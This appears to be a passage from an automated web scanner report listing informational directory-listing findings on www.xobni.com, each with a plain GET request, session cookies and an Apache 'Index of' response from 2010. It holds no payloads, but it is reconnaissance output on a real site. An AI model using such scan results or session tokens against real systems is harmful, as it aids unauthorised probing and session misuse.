...[SNIP]...

13.51. http://www.xobni.com/javascripts/swfobject/2.2/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /javascripts/swfobject/2.2/

Request

GET /javascripts/swfobject/2.2/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:10:08 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1075
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /javascripts/swfobject/2.2</title>
</head>
<body>
<h1>Index of /javascripts/swfobject/2.2</h1>
<table><tr><th
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/javascripts/swfobject/">Parent Directory</a>
...[SNIP]...

13.52. http://www.xobni.com/media/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/

Request

GET /media/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 6145
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media</title>
</head>
<body>
<h1>Index of /media</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/">Parent Directory</a>
...[SNIP]...

13.53. http://www.xobni.com/media/contextual_gadgets/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/contextual_gadgets/

Request

GET /media/contextual_gadgets/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 845
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/contextual_gadgets</title>
</head>
<body>
<h1>Index of /media/contextual_gadgets</h1>
<table><tr><th><
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.54. http://www.xobni.com/media/contextual_gadgets/hoovers/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/contextual_gadgets/hoovers/

Request

GET /media/contextual_gadgets/hoovers/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1465
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/contextual_gadgets/hoovers</title>
</head>
<body>
<h1>Index of /media/contextual_gadgets/hoovers</h1>

...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/contextual_gadgets/">Parent Directory</a>
...[SNIP]...

13.55. http://www.xobni.com/media/contextual_gadgets/hoovers/images/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/contextual_gadgets/hoovers/images/

Request

GET /media/contextual_gadgets/hoovers/images/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2630
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/contextual_gadgets/hoovers/images</title>
</head>
<body>
<h1>Index of /media/contextual_gadgets/hoover
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/contextual_gadgets/hoovers/">Parent Directory</a>
...[SNIP]...

13.56. http://www.xobni.com/media/enterprise/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/enterprise/

Request

GET /media/enterprise/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:40 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1073
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/enterprise</title>
</head>
<body>
<h1>Index of /media/enterprise</h1>
<table><tr><th><img src="/icons/
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.57. http://www.xobni.com/media/gadgets/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/gadgets/

Request

GET /media/gadgets/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:42 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 813
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/gadgets</title>
</head>
<body>
<h1>Index of /media/gadgets</h1>
<table><tr><th><img src="/icons/blank.
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.58. http://www.xobni.com/media/invites/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/invites/

Request

GET /media/invites/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:43 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1515
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/invites</title>
</head>
<body>
<h1>Index of /media/invites</h1>
<table><tr><th><img src="/icons/blank.
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.59. http://www.xobni.com/media/labs/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/labs/

Request

GET /media/labs/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:43 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 815
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/labs</title>
</head>
<body>
<h1>Index of /media/labs</h1>
<table><tr><th><img src="/icons/blank.gif" a
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.60. http://www.xobni.com/media/mobile/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/mobile/

Request

GET /media/mobile/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:40 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1927
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/mobile</title>
</head>
<body>
<h1>Index of /media/mobile</h1>
<table><tr><th><img src="/icons/blank.gi
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.61. http://www.xobni.com/media/plus/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/plus/

Request

GET /media/plus/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2119
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/plus</title>
</head>
<body>
<h1>Index of /media/plus</h1>
<table><tr><th><img src="/icons/blank.gif" a
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.62. http://www.xobni.com/media/press/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/press/

Request

GET /media/press/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:43 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 843
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/press</title>
</head>
<body>
<h1>Index of /media/press</h1>
<table><tr><th><img src="/icons/blank.gif"
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.63. http://www.xobni.com/media/tutorials/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/tutorials/

Request

GET /media/tutorials/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:43 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2487
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/tutorials</title>
</head>
<body>
<h1>Index of /media/tutorials</h1>
<table><tr><th><img src="/icons/bl
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.64. http://www.xobni.com/media/walkthroughs/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/walkthroughs/

Request

GET /media/walkthroughs/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:39 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 853
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/walkthroughs</title>
</head>
<body>
<h1>Index of /media/walkthroughs</h1>
<table><tr><th><img src="/ic
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.65. http://www.xobni.com/media/welcome_screen/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/welcome_screen/

Request

GET /media/welcome_screen/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:44 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1067
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/welcome_screen</title>
</head>
<body>
<h1>Index of /media/welcome_screen</h1>
<table><tr><th><img src=
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.66. http://www.xobni.com/media/widgets/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/widgets/

Request

GET /media/widgets/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:45 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4106
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/widgets</title>
</head>
<body>
<h1>Index of /media/widgets</h1>
<table><tr><th><img src="/icons/blank.
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.67. http://www.xobni.com/media/widgetsv2/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/widgetsv2/

Request

GET /media/widgetsv2/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:45 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 5849
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/widgetsv2</title>
</head>
<body>
<h1>Index of /media/widgetsv2</h1>
<table><tr><th><img src="/icons/bl
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.68. http://www.xobni.com/media/widgetsv3/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /media/widgetsv3/

Request

GET /media/widgetsv3/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:46 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8513

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/widgetsv3</title>
</head>
<body>
<h1>Index of /media/widgetsv3</h1>
<table><tr><th><img src="/icons/bl
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.69. http://www.xobni.com/opensource/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /opensource/

Request

GET /opensource/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:17 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1013
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /opensource</title>
</head>
<body>
<h1>Index of /opensource</h1>
<table><tr><th><img src="/icons/blank.gif" a
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/">Parent Directory</a>
...[SNIP]...

13.70. http://www.xobni.com/opensource/MonoGZipStream/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /opensource/MonoGZipStream/

Request

GET /opensource/MonoGZipStream/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1253
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /opensource/MonoGZipStream</title>
</head>
<body>
<h1>Index of /opensource/MonoGZipStream</h1>
<table><tr><th
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/opensource/">Parent Directory</a>
...[SNIP]...

13.71. http://www.xobni.com/opensource/NsisDotNet/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /opensource/NsisDotNet/

Request

GET /opensource/NsisDotNet/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1242
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /opensource/NsisDotNet</title>
</head>
<body>
<h1>Index of /opensource/NsisDotNet</h1>
<table><tr><th><img sr
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
